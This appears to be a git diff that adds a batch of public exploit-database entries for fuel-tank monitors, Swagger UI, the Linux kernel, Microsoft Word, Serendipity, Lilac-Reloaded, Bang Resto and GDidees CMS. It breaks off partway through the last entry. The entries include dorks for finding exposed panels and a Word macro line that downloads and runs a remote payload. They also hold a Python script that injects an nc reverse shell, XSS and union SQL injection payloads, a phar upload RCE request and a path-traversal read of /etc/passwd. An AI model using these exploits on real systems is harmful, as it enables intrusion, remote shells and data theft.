diff --git a/exploits/hardware/remote/51382.txt b/exploits/hardware/remote/51382.txt
new file mode 100644
index 000000000..cebcecef5
--- /dev/null
+++ b/exploits/hardware/remote/51382.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Franklin Fueling Systems TS-550 - Default Password
+# Date: 4/16/2023
+# Exploit Author: parsa rezaie khiabanloo
+# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
+# Version: TS-550
+# Tested on: Linux/Android(termux)
+
+Step 1 : attacker can using these dorks and access to find the panel
+
+inurl:"relay_status.html"
+
+inurl:"fms_compliance.html"
+
+inurl:"fms_alarms.html"
+
+inurl:"system_status.html"
+
+inurl:"system_reports.html'
+
+inurl:"tank_status.html"
+
+inurl:"sensor_status.html"
+
+inurl:"tank_control.html"
+
+inurl:"fms_reports.html"
+
+inurl:"correction_table.html"
+
+Step 2 : attacker can send request
+
+curl -H "Content-Type:text/xml" --data '' http://IP:10001/cgi-bin/tsaws.cgi
+
+
+Step 3 : if get response that show like this
+
+
+
+
+
+
+
+
+
+
+Step 4 : attacker can crack the hashesh using john the ripper
+
+notice : most of the panels password is : admin
+
+Disclaimer:
+The information provided in this advisory is provided "as is" without
+warranty of any kind. Trustwave disclaims all warranties, either express or
+implied, including the warranties of merchantability and fitness for a
+particular purpose. In no event shall Trustwave or its suppliers be liable
+for any damages whatsoever including direct, indirect, incidental,
+consequential, loss of business profits or special damages, even if
+Trustwave or its suppliers have been advised of the possibility of such
+damages. Some states do not allow the exclusion or limitation of liability
+for consequential or incidental damages so the foregoing limitation may not
+apply.
\ No newline at end of file
diff --git a/exploits/json/webapps/51379.txt b/exploits/json/webapps/51379.txt
new file mode 100644
index 000000000..e5e8d0001
--- /dev/null
+++ b/exploits/json/webapps/51379.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
+# Date: 14 April, 2023
+# Exploit Author: Rafael Cintra Lopes
+# Vendor Homepage: https://swagger.io/
+# Version: < 4.1.3
+# CVE: CVE-2018-25031
+# Site: https://rafaelcintralopes.com.br/
+
+# Usage: python swagger-exploit.py https://[swagger-page].com
+
+from selenium import webdriver
+from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
+from selenium.webdriver.chrome.service import Service
+import time
+import json
+import sys
+
+if __name__ == "__main__":
+
+ target = sys.argv[1]
+
+ desired_capabilities = DesiredCapabilities.CHROME
+ desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
+
+ options = webdriver.ChromeOptions()
+ options.add_argument("--headless")
+ options.add_argument("--ignore-certificate-errors")
+ options.add_argument("--log-level=3")
+ options.add_experimental_option("excludeSwitches", ["enable-logging"])
+
+ # Browser webdriver path
+ drive_service = Service("C:/chromedriver.exe")
+
+ driver = webdriver.Chrome(service=drive_service,
+ options=options,
+ desired_capabilities=desired_capabilities)
+
+ driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
+ time.sleep(10)
+ driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
+ time.sleep(10)
+
+ logs = driver.get_log("performance")
+
+ with open("log_file.json", "w", encoding="utf-8") as f:
+ f.write("[")
+
+ for log in logs:
+ log_file = json.loads(log["message"])["message"]
+
+ if("Network.response" in log_file["method"]
+ or "Network.request" in log_file["method"]
+ or "Network.webSocket" in log_file["method"]):
+
+ f.write(json.dumps(log_file)+",")
+ f.write("{}]")
+
+ driver.quit()
+
+ json_file_path = "log_file.json"
+ with open(json_file_path, "r", encoding="utf-8") as f:
+ logs = json.loads(f.read())
+
+ for log in logs:
+ try:
+ url = log["params"]["request"]["url"]
+
+ if(url == "https://petstore.swagger.io/v2/hacked1.json"):
+ print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
+
+ if(url == "https://petstore.swagger.io/v2/hacked2.json"):
+ print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
+
+ except Exception as e:
+ pass
\ No newline at end of file
diff --git a/exploits/linux/local/51384.txt b/exploits/linux/local/51384.txt
new file mode 100644
index 000000000..97317a90b
--- /dev/null
+++ b/exploits/linux/local/51384.txt
@@ -0,0 +1,232 @@
+## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
+## Exploit Author: nu11secur1ty
+## CVE ID: CVE-2023-1998
+
+## Description
+## Summary
+The Linux kernel allows userspace processes to enable mitigations by
+calling prctl with
+[PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html)
+which disables the speculation feature as well as by using seccomp. We
+had noticed that on VMs of at least one major cloud provider, the
+kernel still left the victim process exposed to attacks in some cases
+even after enabling the spectre-BTI mitigation with prctl. The same
+beahaviour can be observed on a bare-metal machine when forcing the
+mitigation to IBRS on boot comand line.
+
+This happened because when plain IBRS was enabled (not enhanced IBRS),
+the kernel had some logic that determined that
+[STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html)
+was not needed. The IBRS bit implicitly protects against cross-thread
+branch target injection. However, with legacy
+[IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html),
+the IBRS bit was cleared on returning to userspace, due to performance
+reasons, which disabled the implicit STIBP and left userspace threads
+vulnerable to cross-thread branch target injection against which STIBP
+protects.
+
+## Severity
+Medium - The kernel failed to protect applications that attempted to
+protect against Spectre v2 leaving them open to attack from other
+processes running on the same physical core in another hyperthread.
+
+## Vulnerable code
+The Bug present on Kernel 6.2
+(https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196)
+implements an optimization that disables STIBP if the mitgation is
+IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace
+as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for
+bare metal machines without eIBRS support also triggers the bug.
+
+```c
+ /*
+ * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
+ * STIBP is not required.
+ */
+ if (!boot_cpu_has(X86_FEATURE_STIBP) ||
+ !smt_possible ||
+ spectre_v2_in_ibrs_mode(spectre_v2_enabled))
+ return;
+```
+## Proof of Concept
+The test consists of two processes. The attacker constantly poisons an
+indirect call to speculatively redirect it to a target address. The
+victim process measures the mispredict rate and tries to mitigate the
+attack either by calling PRCTL or writing to the MSR directly using a
+kernel module that exposes MSR read and write operations to userspace.
+
+```c
+/*
+gcc -o victim test.c -O0 -masm=intel -w -DVICTIM
+gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL
+gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM
+-DMSR -DMSR_VAL=0
+gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1
+gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2
+gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR
+-DMSR_VAL=0 -DIBPB
+gcc -o attacker test.c -O0 -masm=intel -w
+*/
+#include "utils.h"
+#include
+#include
+#include
+
+#ifndef PRINT_AMMOUNT
+#define PRINT_AMMOUNT 1000
+#endif
+
+#define IA32_SPEC_CTRL 72
+
+uint8_t *rdiPtr;
+uint8_t unused[0x500];
+uint8_t probeArray[0x1000] = {2};
+uint8_t unuse2[0x500];
+
+uint32_t f1() {}
+
+int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu)
+{
+ volatile uint8_t d;
+
+ unsigned tries = 0;
+ unsigned hits = 0;
+ unsigned totalHits = 0;
+ unsigned totalTries = 0;
+
+ jitForLoop(srcAddress);
+
+ while (1)
+ {
+
+#ifndef VICTIM
+ callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
+ continue;
+#else
+
+#ifdef IBPB
+ wrmsr_on_cpu(73, cpu, 1);
+#endif
+ for (int i = 0; i < 100; i++)
+ {
+ d = *dstAddress;
+ flush((uint8_t *)&rdiPtr);
+ callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
+ }
+
+ if (probe(&probeArray[0]) < THRESHOLD)
+ {
+ hits++;
+ totalHits++;
+ }
+
+ totalTries++;
+ if (++tries % PRINT_AMMOUNT == 0)
+ {
+
+ printf("Rate: %u/%u MSR[72]=%d\n", hits,
+tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu));
+ #ifdef MSR
+ wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
+ #endif
+ tries = 0;
+ hits = 0;
+ if (totalTries >= PRINT_AMMOUNT * 10)
+ {
+ break;
+ }
+ }
+ usleep(1);
+
+#endif
+ }
+
+ printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits,
+totalTries, (float)totalHits * 100 / (float)totalTries);
+}
+
+int main(int argc, char **argv)
+{
+
+ uint64_t srcAddress;
+ uint64_t dstAddress;
+ uint64_t cpu;
+
+ if (argc < 4)
+ {
+ printf("Usage: %s \n", argv[0]);
+ printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]);
+ return 0;
+ }
+
+ srcAddress = (uint64_t)strtoull(argv[1], NULL, 16);
+ dstAddress = (uint64_t)strtoull(argv[2], NULL, 16);
+ cpu = (uint64_t)strtoull(argv[3], NULL, 16);
+ SetCoreAffinity(cpu);
+
+ uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000);
+ uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000);
+
+#ifdef PRCTL
+ if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
+PR_SPEC_FORCE_DISABLE, 0, 0) != 0)
+ {
+ perror("prctl");
+ }
+ printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL,
+PR_SPEC_INDIRECT_BRANCH, 0, 0, 0));
+#endif
+
+#ifdef MSR
+ printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
+rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
+ wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
+ printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu);
+ printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
+rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
+#endif
+
+// set up leak gadget into position
+#ifdef VICTIM
+ rdiPtr = (uint8_t *)f1;
+ copyLeakGadget(dstAddress);
+#else
+ rdiPtr = (uint8_t *)dstAddress;
+ copyRetGadget(dstAddress);
+#endif
+
+ poison(srcAddress, dstAddress, cpu);
+
+#ifdef MSR
+ printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
+rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
+#endif
+}
+```
+
+
+Timeline
+
+**Date reported** to Cloud providers: 31/12/2022
+
+**Date reported** to security@kernel.org: 20/02/2022
+
+**Date fixed:** 10/03/2023
+
+- [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d)
+
+- https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d
+
+Date disclosed: 12/04/2023
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/exploits/multiple/remote/51376.txt b/exploits/multiple/remote/51376.txt
new file mode 100644
index 000000000..8220a6fb9
--- /dev/null
+++ b/exploits/multiple/remote/51376.txt
@@ -0,0 +1,58 @@
+## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
+## Author: nu11secur1ty
+## Date: 04.14.2023
+## Vendor: https://www.microsoft.com/
+## Software:
+https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
+## Reference:
+https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
+## CVE-ID: CVE-2023-28311
+
+## Description:
+The attack itself is carried out locally by a user with authentication to
+the targeted system. An attacker could exploit the vulnerability by
+convincing a victim, through social engineering, to download and open a
+specially crafted file from a website which could lead to a local attack on
+the victim's computer. The attacker can trick the victim to open a
+malicious web page by using a `Word` malicious file and he can steal
+credentials, bank accounts information, sniffing and tracking all the
+traffic of the victim without stopping - it depends on the scenario and etc.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+The exploit server must be BROADCASTING at the moment when the victim hit
+the button of the exploit!
+
+```vbs
+ Call Shell("cmd.exe /S /c" & "curl -s
+http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
+```
+
+## Reproduce:
+[href](
+https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
+
+## Reference:
+[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
+
+[href](
+https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
+
+## Proof and Exploit
+[href](https://streamable.com/s60x3k)
+
+## Time spend:
+01:00:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/exploits/php/webapps/51372.txt b/exploits/php/webapps/51372.txt
new file mode 100644
index 000000000..f37a9a033
--- /dev/null
+++ b/exploits/php/webapps/51372.txt
@@ -0,0 +1,99 @@
+Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
+Application: Serendipity
+Version: 2.4.0
+Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
+Technology: PHP
+Vendor URL: https://docs.s9y.org/
+Software Link: https://docs.s9y.org/downloads.html
+Date of found: 13.04.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+If we load the poc.phar file in the image field while creating a category, we can run commands on the system.
+
+ I wrote a file with the above payload, a poc.phar extension, and uploaded it.
+
+Visit to http://localhost/serendipity/uploads/poc.phar
+
+poc request:
+
+
+POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1
+Host: localhost
+Content-Length: 1561
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
+Connection: close
+
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[token]"
+
+ae9b8ae35a756c24f9552a021ee81d56
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[action]"
+
+admin
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[adminModule]"
+
+media
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[adminAction]"
+
+add
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"
+Content-Type: application/octet-stream
+
+
+
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[target_filename][1]"
+
+poc.phar
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[target_directory][1]"
+
+
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[column_count][1]"
+
+true
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[imageurl]"
+
+
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[imageimporttype]"
+
+image
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[target_filename][]"
+
+
+------WebKitFormBoundaryZWKPiba66PSVGQzc
+Content-Disposition: form-data; name="serendipity[target_directory][]"
+
+
+------WebKitFormBoundaryZWKPiba66PSVGQzc--
+
+
+poc video : https://youtu.be/_VrrKOTywgo
\ No newline at end of file
diff --git a/exploits/php/webapps/51373.txt b/exploits/php/webapps/51373.txt
new file mode 100644
index 000000000..50d02e17f
--- /dev/null
+++ b/exploits/php/webapps/51373.txt
@@ -0,0 +1,47 @@
+Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)
+Author: Mirabbas Ağalarov
+Application: Serendipity
+Version: 2.4.0
+Bugs: Stored XSS
+Technology: PHP
+Vendor URL: https://docs.s9y.org/
+Software Link: https://docs.s9y.org/downloads.html
+Date of found: 13.04.2023
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+
+1.Anyone who has the authority to create the new entry can do this
+payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E
+
+
+POST /serendipity/serendipity_admin.php? HTTP/1.1
+Host: localhost
+Content-Length: 730
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
+Connection: close
+
+serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1
+
+
+
+2. visit the entry you created
\ No newline at end of file
diff --git a/exploits/php/webapps/51374.py b/exploits/php/webapps/51374.py
new file mode 100755
index 000000000..49ae7e57f
--- /dev/null
+++ b/exploits/php/webapps/51374.py
@@ -0,0 +1,68 @@
+#!/usr/bin/env python
+
+"""
+# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 2023-04-13
+# Exploit Author: max / Zoltan Padanyi
+# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
+# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
+# Version: 2.0.8
+# Tested on: Debian 7.6
+# CVE : N/A
+
+The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;
+
+Use at your own risk!
+
+RCA - wild exec is ongoing without any filtering
+
+in library/Net/Traceroute.php
+
+ 181 function _setTraceroutePath($sysname)
+ 182 {
+ 183 $status = '';
+ 184 $output = array();
+ 185 $traceroute_path = '';
+ 186
+ 187 if ("windows" == $sysname) {
+ 188 return "tracert";
+ 189 } else {
+ 190 $traceroute_path = exec("which traceroute", $output, $status);
+ [...]
+ 257 function traceroute($host)
+ 258 {
+ 259
+ 260 $argList = $this->_createArgList();
+ 261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
+ 262 exec($cmd, $this->_result);
+
+
+"""
+
+import requests
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)
+parser.add_argument("-i", "--ip", help="Listener IP", required=True)
+parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
+args = parser.parse_args()
+
+rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"
+
+body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}
+
+try:
+ r = requests.get(args.url)
+ if r.ok:
+ print("[+] URL looks good...moving forward...")
+ print("[+] Sending exploit in...")
+ r = requests.post(args.url,data=body)
+ if r.ok:
+ print("[+] Got HTTP 200, check your listener!")
+ else:
+ print("[-] Some kind of error happened, check the http response below!")
+ print(r.text)
+except Exception as e:
+ print("General exception: " + str(e))
\ No newline at end of file
diff --git a/exploits/php/webapps/51377.txt b/exploits/php/webapps/51377.txt
new file mode 100644
index 000000000..974609f47
--- /dev/null
+++ b/exploits/php/webapps/51377.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
+# Date: 2023-04-02
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage:
+https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
+# Software Link:
+https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
+# Version: 1.0
+# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
+# CVE: CVE-2023-29848
+
+*Steps to Reproduce:*
+1. First login to your admin panel.
+2. then go to Menu section and click add new menu from group.
+your request data will be:
+
+POST /bangresto/admin/menu.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
+Gecko/20100101 Firefox/111.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 87
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/bangresto/admin/menu.php
+Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6
+Connection: close
+
+itemName=test&itemPrice=1&menuID=1&addItem=
+
+3. Then use any XSS Payload in "itemName" parameter and click add.
+4. You will see XSS pop up.
\ No newline at end of file
diff --git a/exploits/php/webapps/51378.txt b/exploits/php/webapps/51378.txt
new file mode 100644
index 000000000..b1cea4d3c
--- /dev/null
+++ b/exploits/php/webapps/51378.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
+# Date: 2023-04-02
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage:
+https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
+# Software Link:
+https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
+# Version: 1.0
+# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
+# CVE: CVE-2023-29849
+
+*Affected Parameters:*
+btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],
+itemqty[], btnMenuItemID
+
+*Steps to Reproduce:*
+1. First login your staff panel.
+2. then go to "order" menu and Select menu then create order and intercept
+request data using burp suite.
+so your request data will be:
+
+POST /bangresto/staff/displayitem.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
+Gecko/20100101 Firefox/111.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 194
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/bangresto/staff/order.php
+Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
+Connection: close
+
+btnMenuItemID=1&qty=1
+
+3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based
+SQL Injection use this query ".1 union select
+1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
+-" in "btnMenuItemID" parameter.
+4. Check browser you will see user, database and version informations.
\ No newline at end of file
diff --git a/exploits/php/webapps/51381.txt b/exploits/php/webapps/51381.txt
new file mode 100644
index 000000000..56e73d531
--- /dev/null
+++ b/exploits/php/webapps/51381.txt
@@ -0,0 +1,76 @@
+# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
+# Date : 03/27/2023
+# Exploit Author : Hadi Mene
+# Vendor Homepage : https://www.gdidees.eu/
+# Software Link : https://www.gdidees.eu/cms-1-0.html
+# Version : 3.9.1 and earlier
+# Tested on : Debian 11
+# CVE : CVE-2023-27179
+
+### Summary:
+
+GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.
+
+
+### Description :
+
+Imgdownload.php is mainly used by the QR code generation module to download an QR code.
+The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.
+Furthermore, there is no admin session check in this code as it should since only the admin user should normally
+be able to download QR code.
+
+Vulnerable Code :
+
+3. if (isset($_GET["filename"])) {
+4. $filename=$_GET["filename"];
+ .....
+ .....
+27. @readfile($filename) OR die();
+
+
+### POC :
+
+URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd
+
+Exploitation using curl
